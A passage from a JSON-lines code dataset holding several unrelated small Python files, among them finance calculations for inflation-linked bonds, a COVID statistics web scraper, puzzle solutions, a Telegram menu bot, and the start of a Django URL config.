\n","repo_name":"Misl3d/PokeGo-ZXTouch","sub_path":"Scripts/Trade.py","file_name":"Trade.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"26903435417","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 24 18:15:12 2022\n\n@author: mlehr\n\"\"\"\n\n#Initialize the Savings Table\nbalance=100 #Balance $100\nintRate=6 #Percent interest/year\nPERCENT=100 #Conversion to decimal representation of %\nstrtYr=0 #Starting Year\nstrtD8=2022 #Date to Start Computations\nnumCmPds=12 #Number of Compounding Periods\ntitlfmt=\"{:^55}\"\nbalfmt=\" ${:>6.2f}{:<20}\"\nprcfmt=\" {:>5.2f}%{:<20}\"\ncolfmt=\"{:>10}{:>10}{:>10}{:>10}\"\nstrfmt=\"{:10}{:10}{:10.2f}{:10.2f}\"\n\n#Computations\nintRate/=PERCENT\nprint(titlfmt.format(\"Savings Table\"))\nprint()\nprint(balfmt.format(balance,\" = Intital Balance $'s\"))\nprint(prcfmt.format(intRate*PERCENT,\" = Interest Rate %\"))\nprint()\nprint(colfmt.format(\"Year\",\"Date\",\"Balance\",\"Interest\"))\nprint(colfmt.format(\"\",\"\",\"Beg of Yr\",\"End of Yr\"))\nprint()\nfor year in range(strtYr,numCmPds+1):\n interest=balance*intRate\n print(strfmt.format(year,strtD8+year,balance,interest))\n balance+=interest","repo_name":"avalazem/Python_83X_Series","sub_path":"FormatSavingsTable.py","file_name":"FormatSavingsTable.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36237294440","text":"import sys\r\n\r\nprint('Advent of Code - Day 1, Challenge 2')\r\n\r\nuCount=0\r\ndCount=0\r\neCount=0\r\nsantaPos=0\r\ncharPos=1\r\n\r\n\r\n#open input file\r\nfile = open('input.txt')\r\n\r\n#read file content and check content length\r\ncontent = file.read()\r\n\r\n#for each character in file count if up, down or error\r\nfor char in content:\r\n\tif char=='(': \r\n\t\tuCount+=1\r\n\t\tsantaPos+=1\r\n\telif char==')':\r\n\t\tdCount+=1\r\n\t\tsantaPos-=1\r\n\telse: eCount+=1\r\n\tif santaPos<0:\r\n\t\tprint('Santa has entered the basement due to instruction: ', charPos)\r\n\t\tsys.exit(0)\r\n\tcharPos+=1\r\n#print(uCount,' - ',dCount,' - ',eCount)\r\n\r\n#close input file\r\nfile.close()","repo_name":"mjohnston89/AdventOfCode","sub_path":"2015/Day 01/c2.py","file_name":"c2.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26903373547","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 24 20:09:17 2022\n\n@author: mlehr\n\"\"\"\n\n#Initialize the N in N!\nn=int(input(\"Input n output n!\\n\"))\nif n<=0:\n n=0\nfact=1\n\n#Loop to calculate the factorial\nfor x in range(1,n+1):\n fact*=x\n \n#Output the Factorial\nprint(n,\"! = \",fact)","repo_name":"avalazem/Python_83X_Series","sub_path":"Factorial.py","file_name":"Factorial.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"42726451199","text":"k = int(input())\nl = list()\nfor i in range(k):\n\tyear = 2022\n\ty, c1, c2 = list(map(int, input().split()))\n\twhile True:\n\t\tif (year - y) % c1 == 0 and (year - y) % c2 == 0:\n\t\t\tbreak\n\t\telse:\n\t\t\tyear += 1\n\tl.append(year)\nprint(min(l))","repo_name":"Weiguo-Jiang/Kattis-Solutions","sub_path":"locustlocus.py","file_name":"locustlocus.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"11510359737","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass IndiaStatesSpider(scrapy.Spider):\n name = 'india_states'\n allowed_domains = ['www.mohfw.gov.in']\n start_urls = ['http://www.mohfw.gov.in/']\n\n def parse(self, response):\n rows = response.xpath(\"//table[@class='table table-striped']/tbody/tr[position()<=33]\")\n total_rows = response.xpath(\"//table[@class='table table-striped']/tbody/tr[position()=34]\")\n for row in rows:\n states_no = row.xpath(\".//td[1]/text()\").get()\n states_name = row.xpath(\".//td[2]/text()\").get()\n total_confirmed_cases = row.xpath(\".//td[3]/text()\").get()\n cured_discharged_migrated = row.xpath(\".//td[4]/text()\").get()\n death = row.xpath(\".//td[5]/text()\").get()\n yield {\n 'states_no': states_no,\n 'states_name': states_name,\n 'total_cases': total_confirmed_cases,\n 'cured': cured_discharged_migrated,\n 'death': death\n }\n\n for total in total_rows:\n total_india = total.xpath(\".//td[1]/strong/span/text()\").get()\n total_confirmed_cases_india = total.xpath(\".//td[2]/strong/text()\").get()\n total_cured_discharged_migrated = total.xpath(\".//td[3]/strong/text()\").get()\n total_death = total.xpath(\".//td[4]/strong/text()\").get()\n yield {\n 'total_india': total_india,\n 'country_name': 'India',\n 'total_cases': total_confirmed_cases_india.replace('#', ''),\n 'total_cured': total_cured_discharged_migrated,\n 'total_death': total_death\n }\n","repo_name":"vickyboston20/covid19","sub_path":"covid/spiders/india_states.py","file_name":"india_states.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73008017327","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas as pd\nfrom pyg_bond._base import rate_format, annual_freq\nfrom pyg_base import dt, drange, ts_gap, years_to_maturity, df_reindex, mul_, add_, pd2np, is_num, loop, is_ts, is_arr, calendar, df_sync, DAY\nfrom pyg_timeseries import shift, diff\n\n\n\ndef observations_per_year(ts):\n if not is_ts(ts):\n return np.nan\n observations = len(ts) - 1\n if observations == 0:\n return np.nan\n days = (ts.index[-1] - ts.index[0]).days\n if days < 1:\n return np.nan\n years = days / 365\n f = observations / years\n if f > 300:\n return round(f/365,0) * 365\n elif f > 200:\n return 252 ## business days in a year\n elif f > 150:\n return 182.5\n elif f > 30:\n return round(f/52,0) * 52 ## per week\n elif f > 6:\n return round(f/12,0) * 12\n elif f >2:\n return 4\n else:\n return 1\n\n\ndef as_eom(date):\n return dt(date.year, date.month+1, 0)\n\ndef cpi_reindexed(cpi, ts, gap = None):\n \"\"\"\n Parameters\n ----------\n cpi: constant or a timeseries\n ts: the timeseries on which we wish to evaluate the cpi values\n gap: the gap (in months) between successive cpi indexes values\n \n For most cpi indices, index is published every month.\n \n august cpi is published in september and that return materializes over october to november\n interestingly, this future growth is KNOWN so potentially, future back adjusted calculation is possible\n \n For Australia, months = 3\n \n Example\n -------\n >>> from pyg import *\n >>> cpi = pd.Series(range(82),[date - DAY for date in drange(dt(2003,4,1), dt(0), '3m')])\n >>> ts = pd.Series(1, drange(-6999))\n >>> cpi_reindexed(aucpi, ts) \n \n 2004-07-31 3.989130 ## aim from 3 in June\n 2004-08-01 4.000000\n 2004-08-02 4.010870\n 2004-08-03 4.021739\n 2004-08-04 4.032609\n \n 2023-09-25 80.597826\n 2023-09-26 80.608696\n 2023-09-27 80.619565\n 2023-09-28 80.630435\n 2023-09-29 80.641304 ## aim towards 81 in November\n \n \"\"\"\n if is_ts(cpi):\n n = observations_per_year(cpi)\n if gap is None or gap == 0:\n if n <= 12:\n gap = int(12 /n)\n else:\n return df_reindex(cpi, ts, method = 'ffill')\n else:\n gap = int(gap)\n if n > 12:\n cpi_eom = cpi.resample(f'{gap}m').last()\n dates = [dt(eom+DAY, f'{gap+1}m') for eom in cpi_eom.index]\n else:\n cpi_eom = cpi\n dates = [dt(dt(eom.year, eom.month+1 , 1) if eom.month<12 else dt(eom.year+1, 1, 1), f'{gap+1}m') for eom in cpi_eom.index]\n if isinstance(cpi, pd.DataFrame):\n res = pd.DataFrame(cpi_eom.values, index = dates, columns = cpi_eom.columns)\n else:\n res = pd.Series(cpi_eom.values, index = dates)\n t0 = min(ts.index[0], res.index[0])\n t1 = max(ts.index[-1], res.index[-1])\n extended_dates = drange(dt(t0.year, t0.month, 0), dt(t1.year, t1.month+1,0))\n rtn = df_reindex(df_reindex(res, extended_dates, method = 'linear'), ts)\n return rtn\n else:\n return cpi\n\ndef ilb_ratio(cpi, base_cpi = 1, floor = 1):\n ratio = cpi/base_cpi\n if floor:\n ratio = np.maximum(floor, ratio)\n return ratio\n \ndef ilb_total_return(price, coupon, funding, cpi, base_cpi = None, floor = 1, rate_fmt = 100, \n freq = 2, dirty_correction = True, gap = None):\n \"\"\"\n inflation linked bond clean price is quoted prior to notional multiplication and accrual\n \n So:\n notional = cpi / base_cpi\n carry = daily_accrual - daily_funding\n MTM = notional * dirty price\n change(dirty_price) = change(clean_price) + carry\n\n Using the product rule:\n \n change(MTM) = change(notional * clean_price) + notional * carry + change(notional) * (dirty-clean)\n\n We actually approximate it a little... as\n change(MTM) = change(notional * clean_price) + notional * carry + change(notional) * AVG(dirty-clean)\n since\n AVG(dirty-clean) = 0.5 * (coupon / freq) (it grows from 0 to coupon/freq before dropping back to 0)\n \n :Example:\n ---------\n >>> from pyg import * \n >>> coupon = 3\n >>> funding = 1\n >>> price = pd.Series([80, 80, np.nan] * 87 + [80], drange(2001,2002,'1b')) ## \n >>> rate_fmt = 100 \n >>> base_cpi = floor = 1\n >>> cpi = pd.Series(np.arange(1,2+1/261,1./261), drange(2001,2002,'1b'))\n >>> tri = ilb_total_return(price, coupon, funding, base_cpi, cpi, floor = 1, rate_fmt = 100, dirty_correction = False)\n \n The total return in MTM is due to notional doubling due to inflation. \n Price remain constant so MTM going up from 80 to 160.\n \n Carry should be almost exactly: (3 - 0.8) * cpi.mean() == 3.3 ## 3% less funding of 80 at 1%\n \n >>>> assert (tri.sum() - 83.3)<1e-2\n \n \n \"\"\"\n freq = annual_freq(freq)\n rate_fmt = rate_format(rate_fmt)\n mask = np.isnan(price)\n prc = price[~mask]\n dcf = ts_gap(prc)/365 ## day count fraction, forward looking\n notional = cpi_reindexed(cpi, ts = price, gap = gap) \n if base_cpi is None or base_cpi == 0:\n base_cpi = notional[~np.isnan(notional)].iloc[0]\n notional = notional / base_cpi\n finance = (prc/100) * df_reindex(funding, prc, method = ['ffill', 'bfill'])\n notional[mask] = np.nan\n if floor:\n notional = np.maximum(floor, notional)\n carry = df_reindex(shift(mul_([coupon - finance, dcf, notional])), price) ## ## accruals less funding costs on notional\n pv = mul_(price, notional)\n rtn = diff(pv)\n if dirty_correction:\n dirty_change_in_notional = diff(notional) * (coupon / (2 * freq))\n return add_([rtn, (100/rate_fmt) * carry, dirty_change_in_notional])\n else:\n return add_([rtn, (100/rate_fmt) * carry])\n \n\n@pd2np\ndef _ilb_pv_and_durations(nominal_yld, cpi_yld, tenor, coupon, freq = 2):\n \"\"\"\n \n Given \n - yld by which we discount all cash flows,\n - cpi_yld: the growth rate of cpi\n and the usual tenor, coupon, freq defining the cash flows,\n can we determine the pv of an ilb and its derivative wrt both yld and cpi_yld\n \n\n :Present Value calculation:\n --------------------------\n \n There are n = freq * tenor periods\n and a period discount factor, i.e. \n\n d = (1 + yld/freq) [so that paying a coupon of y/freq at end of period, would keep value constant at 1]\n\n On the other hand, there is growth factor g = (1 + cpi_yld/freq) since we get paid based on growth of cpi\n\n g = (1+cpi_yld/freq)\n\n Let f = g / d\n\n and let r = 1/(1-f)\n\n just like a normal bond:\n \n coupons_pv = c f + c * f^2 + ... c * f ^ (freq * tenor) \n = c f * (1+f...+f^(n-1)) \n = c f * (1 - f^n) / (1 - f) = c * f * (1-f^n) * r\n notional_pv = f^n\n \n if yld == cpi_yld and f == 1 then...\n pv = 1 + c * n # n coupons + notional\n \n :duration calculation:\n --------------------------\n we denote p = cpi_yld\n df/dy = - 1/freq * g/d^2 = - f^2 / (freq * g)\n df/dp = = 1/(freq * d) = f / (freq * g) \n \n dr/dy = r^2 df/dy\n dr/dp = r^2 df/dp\n \n \n yield duration\n ---------------\n - dnotional/dy = n f ^ (n-1) df/dy \n - dcoupons/dy = c * df/dy * [(1-f^n)*r - f * n f^n-1 *r + f * (1-f^n) * r^2] # using the product rule\n = c * df/dy * r [(1-f^n) - n * f^n + f(1-f^n)*r] \n\n if yld == cpi_yld and f == 1 then..\n \n dnotional_dy = tenor\n coupons_pv = c f + c * f^2 + ... c * f ^ (freq * tenor) = c * f * (1+f...+f^(n-1)) \n dcoupon_dy/c = df/dy ( 1 + 2f + 3 f^2 ... + nf^(n-1)) \n = df/fy (1+...n) # since f = 1\n = (1/g * freq) n(n+1)/2\n\n cpi duration\n ------------\n The formula is identical, except we replace df/dy with df/dp so we just need to divide by -f\n \n \n Example: ilb calculations match normal bond when cpi_yld = 0\n ---------\n >>> tenor = 10; coupon = 0.02; yld = 0.05; cpi_yld = 0.03; freq = 2\n \n >>> _ilb_pv_and_durations(yld = yld, cpi_yld = 0.00, tenor = tenor, coupon = coupon, freq = freq)\n >>> (0.7661625657152991, 6.857403925710587, 6.690150171424962)\n \n >>> _bond_pv_and_duration(yld = yld, tenor = tenor, coupon = coupon, freq = freq)\n >>> (0.7661625657152991, 6.690150171424962)\n\n Example: ilb calculated duration is same as empirical one\n ---------\n >>> pv3, cpi3, yld3 = _ilb_pv_and_durations(yld = yld, cpi_yld = 0.03, tenor = tenor, coupon = coupon, freq = freq)\n >>> pv301, cpi301, yld301 = _ilb_pv_and_durations(yld = yld, cpi_yld = 0.0301, tenor = tenor, coupon = coupon, freq = freq)\n >>> 1e4 * (pv301 - pv3), 0.5*(cpi301 + cpi3)\n\n\n \"\"\"\n n = tenor * freq\n c = coupon / freq\n if is_arr(nominal_yld):\n nominal_yld[nominal_yld<=-freq] = np.nan\n elif nominal_yld<=-freq:\n nominal_yld = np.nan\n if is_arr(cpi_yld):\n cpi_yld[cpi_yld<=-freq] = np.nan\n elif cpi_yld<=-freq:\n cpi_yld= np.nan\n d = (1 + nominal_yld / freq)\n g = (1 + cpi_yld / freq)\n if is_num(nominal_yld) and is_num(cpi_yld) and nominal_yld == cpi_yld: \n pv = 1 + n * c\n yld_duration = n * (n + 1) / (2 * freq * g)\n cpi_duration = yld_duration\n f = g / d\n dfy = f**2 / (g * freq) ## we ignore the negative sign\n dfp = f / (g * freq)\n fn1 = f ** (n-1) \n r = 1 / (1 - f)\n notional_pv = fn = fn1 * f\n dnotional_dy = n * fn1 * dfy\n dnotional_dp = n * fn1 * dfp\n coupon_pv = c * f * (1 - fn) * r\n pv = notional_pv + coupon_pv\n dcoupon_dy = c * dfy * r * ((1 - fn) - n * fn + f * (1-fn) * r)\n dcoupon_dp = c * dfp * r * ((1 - fn) - n * fn + f * (1-fn) * r)\n yld_duration = dnotional_dy + dcoupon_dy\n cpi_duration = dnotional_dp + dcoupon_dp\n if isinstance(nominal_yld, (pd.Series, pd.DataFrame, np.ndarray)):\n mask = f == 1\n pv0 = 1 + n * c\n duration0 = tenor + c*n*(n+1)/(2*freq*g)\n pv[mask] = pv0 if is_num(pv0) else pv0[mask]\n yld_duration[mask] = duration0 if is_num(duration0) else duration0[mask]\n cpi_duration[mask] = duration0 if is_num(duration0) else duration0[mask]\n return pv, cpi_duration, yld_duration\n\n\ndef ilb_pv(nominal_yld, cpi_yld, tenor, coupon, freq = 2, rate_fmt = None):\n \"\"\"\n Given \n - nominal_yld by which we discount all cash flows,\n - cpi_yld: the growth rate of cpi\n \n and the usual tenor, coupon, freq defining the cash flows,\n can we determine the pv of an ilb and its derivative wrt both yld and cpi_yld\n \n \n Example:\n --------\n cpi_yld = ilb_cpi_yld(100, )\n \n\n :Present Value calculation:\n --------------------------\n \n There are n = freq * tenor periods\n and a period discount factor, i.e. \n\n d = (1 + nominal_yld/freq) [so that paying a coupon of y/freq at end of period, would keep value constant at 1]\n\n On the other hand, there is growth factor g = (1 + cpi_yld/freq) since we get paid based on growth of cpi\n\n g = (1+cpi_yld/freq)\n\n Let f = g / d\n\n and let r = 1/(1-f)\n\n just like a normal bond:\n \n coupons_pv = c f + c * f^2 + ... c * f ^ (freq * tenor) \n = c f * (1+f...+f^(n-1)) \n = c f * (1 - f^n) / (1 - f) = c * f * (1-f^n) * r\n notional_pv = f^n\n \n if nominal_yld == cpi_yld and f == 1 then...\n pv = 1 + c * n # n coupons + notional\n \n :duration calculation:\n ----------------------\n we denote p = cpi_yld and y = yld = nominal_yld\n \n f = g/d = (1+p/freq)/(1+y/freq)\n df/dy = - 1/freq * g/d^2 = - f^2 / (freq * g)\n df/dp = 1/(freq * d) = f / (freq * g) \n \n dr/dy = r^2 df/dy\n dr/dp = r^2 df/dp\n \n nominal yield duration\n ---------------\n - dnotional/dy = n f ^ (n-1) df/dy \n - dcoupons/dy = c * df/dy * [(1-f^n)*r - f * n f^n-1 *r + f * (1-f^n) * r^2] # using the product rule\n = c * df/dy * r [(1-f^n) - n * f^n + f(1-f^n)*r] \n\n if yld == cpi_yld and f == 1 then..\n \n dnotional_dy = tenor\n coupons_pv = c f + c * f^2 + ... c * f ^ (freq * tenor) = c * f * (1+f...+f^(n-1)) \n dcoupon_dy/c = df/dy ( 1 + 2f + 3 f^2 ... + nf^(n-1)) \n = df/fy (1+...n) # since f = 1\n = (1/g * freq) n(n+1)/2\n\n cpi duration\n ------------\n The formula is identical, except we replace df/dy with df/dp so we just need to divide by -f\n \n Example: ilb calculations match normal bond when cpi_yld = 0\n ---------\n >>> tenor = 10; coupon = 0.02; yld = 0.05; cpi_yld = 0.03; freq = 2\n \n >>> _ilb_pv_and_durations(yld = yld, cpi_yld = 0.00, tenor = tenor, coupon = coupon, freq = freq)\n >>> (0.7661625657152991, 6.857403925710587, 6.690150171424962)\n \n >>> _bond_pv_and_duration(yld = yld, tenor = tenor, coupon = coupon, freq = freq)\n >>> (0.7661625657152991, 6.690150171424962)\n\n Example: ilb calculated duration is same as empirical one\n ---------\n >>> pv3, cpi3, yld3 = _ilb_pv_and_durations(yld = yld, cpi_yld = 0.03, tenor = tenor, coupon = coupon, freq = freq)\n >>> pv301, cpi301, yld301 = _ilb_pv_and_durations(yld = yld, cpi_yld = 0.0301, tenor = tenor, coupon = coupon, freq = freq)\n >>> 1e4 * (pv301 - pv3), 0.5*(cpi301 + cpi3)\n\n\n \"\"\"\n freq = annual_freq(freq)\n rate_fmt = rate_format(rate_fmt)\n nominal_yld, cpi_yld = df_sync([nominal_yld, cpi_yld])\n if rate_fmt!=1:\n nominal_yld, cpi_yld, coupon = nominal_yld/rate_fmt, cpi_yld/rate_fmt, coupon/rate_fmt \n tenor = years_to_maturity(tenor, cpi_yld)\n pv, cpi_duration, yld_duration = _ilb_pv_and_durations(nominal_yld, cpi_yld, tenor = tenor, coupon = coupon, freq = freq)\n px = pv * 100\n return px\n \ndef ilb_yld_duration(nominal_yld, cpi_yld, tenor, coupon, freq = 2, rate_fmt = None):\n freq = annual_freq(freq)\n rate_fmt = rate_format(rate_fmt)\n nominal_yld, cpi_yld = df_sync([nominal_yld, cpi_yld])\n if rate_fmt!=1:\n nominal_yld, cpi_yld, coupon = nominal_yld/rate_fmt, cpi_yld/rate_fmt, coupon/rate_fmt \n tenor = years_to_maturity(tenor, cpi_yld)\n pv, cpi_duration, yld_duration = _ilb_pv_and_durations(nominal_yld, cpi_yld, tenor = tenor, coupon = coupon, freq = freq)\n return yld_duration\n \n\ndef ilb_cpi_duration(nominal_yld, cpi_yld, tenor, coupon, freq = 2, rate_fmt = None):\n freq = annual_freq(freq)\n rate_fmt = rate_format(rate_fmt)\n nominal_yld, cpi_yld = df_sync([nominal_yld, cpi_yld])\n if rate_fmt!=1:\n nominal_yld, cpi_yld, coupon = nominal_yld/rate_fmt, cpi_yld/rate_fmt, coupon/rate_fmt \n tenor = years_to_maturity(tenor, cpi_yld)\n pv, cpi_duration, yld_duration = _ilb_pv_and_durations(nominal_yld, cpi_yld, tenor = tenor, coupon = coupon, freq = freq)\n return cpi_duration\n\n\ndef _ilb_cpi_yld_and_duration(price, nominal_yld, tenor, coupon, freq = 2, iters = 5):\n \"\"\"\n\t\n We calculate break-even yield for a bond, given its price, the yield of a normal government bond and tenor and coupons...\t\n We expect price to be quoted as per usual in market, i.e. 100 being par value. However, coupon and yield should be in fed actual values.\n\n Parameters\n ----------\n price : float/array\n clean price of an inflation linked bond\n nominal_yld: float/array\n The yield of a vanilla government bond, used as a reference for discounting cash flows\n tenor : int\n tenor of a bond.\n coupon : float, optional\n coupon of a bond. The default is 0.06.\n freq : int, optional\n number of coupon payments per year. The default is 2.\n iters : int, optional\n Number of iterations to find yield. The default is 5.\n\n Returns\n -------\n\treturns a dict of the following keys:\n\t\n yld : number/array\n the yield of the bond\n\tduration: number/array \n\t\tthe duration of the bond. Note that this is POSITIVE even though the dPrice/dYield is negative\n \"\"\"\n px = price /100\n cpi_yld = 0\n for _ in range(1+iters):\n pv, cpi_duration, yld_duration = _ilb_pv_and_durations(nominal_yld, cpi_yld, tenor, coupon, freq = freq)\n cpi_yld = cpi_yld + (px - pv) / cpi_duration\n return dict(cpi_yld = cpi_yld, cpi_duration = cpi_duration, yld_duration = yld_duration)\n\n_ilb_cpi_yld_and_duration.output = ['cpi_yld', 'cpi_duration', 'yld_duration']\n\n_ilb_cpi_yld_and_duration_ = loop(pd.DataFrame, pd.Series)(_ilb_cpi_yld_and_duration)\n\n\ndef ilb_cpi_yld_and_duration(price, nominal_yld, tenor, coupon, freq = 2, iters = 5, rate_fmt = None):\n \"\"\"\n calculates both cpi_yield and cpi_duration from a maturity date or a tenor.\n cpi_yld is the breakeven yield inflation that matches the prices with vanilla bond.\n\n Parameters\n ----------\n price : float/array\n price of bond\n nominal_yld: float/array\n yield of a NOMINAL bond with similar maturity\n tenor: int, date, array\n if a date, will calculate \n coupon : float, optional\n coupon of a bond. The default is 0.06.\n freq : int, optional\n number of coupon payments per year. The default is 2.\n iters : int, optional\n Number of iterations to find yield. The default is 5.\n\n Returns\n -------\n res : dict\n cpi_yld and cpi_duration.\n \n Example:\n --------\n >>> cpi_yld = ilb_cpi_yld(84, nominal_yld = 0.04, tenor = 10, coupon = 0.01, cpi = 1.3, base_cpi = 1)\n >>> px = ilb_pv(nominal_yld = 0.04, cpi_yld = res['cpi_yld'], tenor = 10, coupon = 0.01)\n >>> assert abs(px-84)<1e-6\n \"\"\"\n freq = annual_freq(freq)\n rate_fmt = rate_format(rate_fmt)\n price, nominal_yld = df_sync([price, nominal_yld])\n tenor = years_to_maturity(tenor, price)\n if rate_fmt == 1: \n return _ilb_cpi_yld_and_duration_(price, nominal_yld, tenor, coupon, freq = freq, iters = iters)\n else:\n res = _ilb_cpi_yld_and_duration_(price = price, \n nominal_yld = nominal_yld/rate_fmt, tenor = tenor, coupon = coupon/rate_fmt, \n freq = freq, iters = iters)\n res['cpi_yld'] *= rate_fmt\n return res\n\nilb_cpi_yld_and_duration.output = _ilb_cpi_yld_and_duration.output \n\n\ndef ilb_cpi_yld(price, nominal_yld, tenor, coupon, freq = 2, iters = 5, rate_fmt = None):\n \"\"\"\n\t\n\tbond_yld calculates yield from price iteratively using Newton Raphson gradient descent.\n\t\n We expect price to be quoted as per usual in market, i.e. 100 being par value. However, coupon and yield should be in fed actual values.\n\n Parameters\n ----------\n price : float/array\n price of bond\n tenor : int\n tenor of a bond.\n coupon : float, optional\n coupon of a bond. The default is 0.06.\n freq : int, optional\n number of coupon payments per year. The default is 2.\n iters : int, optional\n Number of iterations to find yield. The default is 5.\n rate_fmt: how you prefer to quote rates: 1 = 6% is represented as 0.06, 100 = 6% is represented as 6.\n\n Returns\n -------\n yld : number/array\n the yield of the bond\n \"\"\"\n\n return ilb_cpi_yld_and_duration(price = price, nominal_yld = nominal_yld, \n tenor = tenor, coupon = coupon, freq = freq, iters = iters, \n rate_fmt = rate_fmt)['cpi_yld']\n\n\n\n\n","repo_name":"gityoav/pyg-bond","sub_path":"src/pyg_bond/_ilb.py","file_name":"_ilb.py","file_ext":"py","file_size_in_byte":19456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34198158767","text":"class CQueue:\r\n def __init__(self):\r\n self.stack1 = []\r\n self.stack2 = []\r\n self.size = 0\r\n\r\n def appendTail(self, value: int) -> None:\r\n while self.stack1:\r\n self.stack2.append(self.stack1.pop())\r\n\r\n self.stack1.append(value)\r\n while self.stack2:\r\n self.stack1.append(self.stack2.pop())\r\n\r\n self.size += 1\r\n\r\n def deleteHead(self) -> int:\r\n if self.size <= 0:\r\n return -1\r\n\r\n self.size -= 1\r\n return self.stack1.pop()\r\n\r\n\r\n# Your CQueue object will be instantiated and called as such:\r\n# obj = CQueue()\r\n# obj.appendTail(value)\r\n# param_2 = obj.deleteHead()","repo_name":"lost-person/Leetcode","sub_path":"面试题09.利用两个栈实现队列.py","file_name":"面试题09.利用两个栈实现队列.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38808961156","text":"\"\"\"\nCreated on Mar 30, 2011\n\n@author: guillaume\n\"\"\"\n\nimport os\n\nimport scipy as sc\n\nfrom chemex import utils\n\n\ndef read_data(cfg, working_dir, global_parameters, res_incl=None, res_excl=None):\n \"\"\"Read the shifts\"\"\"\n\n # Reads the path to get the shifts\n exp_data_dir = utils.normalize_path(working_dir,\n cfg.get('path', 'exp_data_dir'))\n\n data_points = list()\n\n experiment_name = name_experiment(global_parameters)\n\n for key, val in cfg.items('data'):\n\n if 'file' not in key:\n continue\n\n parameters = dict(global_parameters)\n\n parameters['experiment_name'] = experiment_name\n\n abs_path_filename = os.path.join(exp_data_dir, val)\n data_points += read_a_shift_file(abs_path_filename, parameters, res_incl, res_excl)\n\n return data_points\n\n\ndef name_experiment(global_parameters=None):\n if global_parameters is None:\n global_parameters = dict()\n\n if 'experiment_name' in global_parameters:\n name = global_parameters['experiment_name'].strip().replace(' ', '_')\n else:\n exp_type = global_parameters['experiment_type']\n h_larmor_frq = float(global_parameters['h_larmor_frq'])\n temperature = float(global_parameters['temperature'])\n\n name = '{:s}_{:.0f}MHz_{:.0f}C'.format(exp_type, h_larmor_frq, temperature).lower()\n\n return name\n\n\ndef read_a_shift_file(filename, parameters, res_incl=None, res_excl=None):\n \"\"\"Reads in the fuda file and spit out the intensities\"\"\"\n\n data = sc.loadtxt(filename, dtype=[('resonance_id', 'S10'), ('shift_ppb', 'f8'), ('shift_ppb_err', 'f8')])\n\n data_points = list()\n\n exp_type = parameters['experiment_type'].replace('_shift', '')\n data_point = __import__(exp_type + '.data_point', globals(), locals(), ['DataPoint'], -1)\n\n for resonance_id, shift_ppb, shift_ppb_err in data:\n\n included = (\n (res_incl is not None and resonance_id in res_incl) or\n (res_excl is not None and resonance_id not in res_excl) or\n (res_incl is None and res_excl is None)\n )\n\n if not included:\n continue\n\n parameters['resonance_id'] = resonance_id\n\n data_points.append(data_point.DataPoint(shift_ppb, shift_ppb_err, parameters))\n\n return data_points\n","repo_name":"marcuscangussu/chemex_bouvignies","sub_path":"chemex/experiments/shift/reading.py","file_name":"reading.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34901644877","text":"import telebot\nfrom decouple import config\nfrom telebot import types\n\nbot = telebot.TeleBot(config(\"TOKEN_BOT\"))\n\n\n@bot.message_handler(commands=[\"start\", \"Hello\"])\ndef get_start_message(message):\n full_name = f\"{message.from_user.last_name} {message.from_user.first_name} !!!\"\n text = f\"Welcome {full_name}\"\n bot.send_message(message.chat.id, text)\n bot.reply_to(message, text)\n\n@bot.message_handler(content_types=[\"text\"])\ndef get_message(message):\n markup = types.InlineKeyboardMarkup(row_width=2)\n if message.text.lower() == \"меню\":\n text = \"Выберите пожалуйста:\"\n button1 = types.InlineKeyboardButton(\"чай\", callback_data=\"tea\")\n #button1 = types.InlineKeyboardButton(\"чай\", url=\"https://www.google.com/search?q=tea&sxsrf=ALiCzsYn0Nu6SBiO31Bp65hNn51LrgWTIQ:1667537037440&source=lnms&tbm=isch&sa=X&ved=2ahUKEwj5uZDG25P7AhUJ_CoKHdSpCOwQ_AUoAXoECAEQAw\")\n button2 = types.InlineKeyboardButton(\"кофе\", callback_data=\"coffee\")\n markup.add(button1, button2)\n bot.send_message(message.chat.id, text, reply_markup=markup)\n\n@bot.callback_query_handler(func=lambda call: True)\ndef get_callback_data(call):\n murkup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n text = \"\"\n if call.data == \"tea\":\n text = f\"Выберите желаемый чай внизy:\"\n btn1 =types.KeyboardButton(\"black\")\n btn2 = types.KeyboardButton(\"blue\")\n btn3 = types.KeyboardButton(\"green\")\n murkup.add(btn1, btn2, btn3)\n if call.data == \"coffee\":\n text = f\"Выберите желаемый кофе внизy:\"\n btn1 = types.KeyboardButton(\"latte\")\n btn2 = types.KeyboardButton(\"cappuchino\")\n btn3 = types.KeyboardButton(\"espresso\")\n murkup.add(btn1, btn2, btn3)\n\n bot.send_message(call.message.chat.id, text, reply_markup=murkup)\n\n\n\nbot.polling()","repo_name":"temirbekovaaidana/pybot","sub_path":"start_bot.py","file_name":"start_bot.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"37624486997","text":"from django.conf.urls import patterns, url\n\nfrom peni import views\n\nurlpatterns = patterns('',\n\turl(r'^$', views.home, name='index'),\n\turl(r'search/$', views.search, name='search'),\n\turl(r'scan/$', views.bug_scan, name='scan'),\n\turl(r'sql/$', views.sql_injection, 